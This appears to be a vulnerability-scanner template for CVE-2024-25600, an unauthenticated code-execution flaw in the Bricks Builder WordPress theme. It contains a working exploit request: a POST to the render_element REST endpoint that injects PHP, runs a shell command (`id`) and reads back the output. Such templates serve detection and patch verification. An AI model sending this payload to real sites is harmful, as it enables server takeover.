id: CVE-2024-25600 info: name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6 author: christbowel severity: critical description: | Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600 - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/ - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6 - https://github.com/Chocapikk/CVE-2024-25600 - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation metadata: publicwww-query: "/wp-content/themes/bricks/" verified: true max-request: 2 tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-json/bricks/v1/render_element HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "postId": "1", "nonce": "{{nonce}}", "element": { "name": "container", "settings": { "hasLoop": "true", "query": { "useQueryEditor": true, "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);", "objectType": "post" } } } } matchers-condition: and matchers: - type: word part: body words: - "Exception:" - "uid" condition: and extractors: - type: regex name: nonce part: body group: 1 regex: - 'nonce":"([0-9a-z]+)' internal: true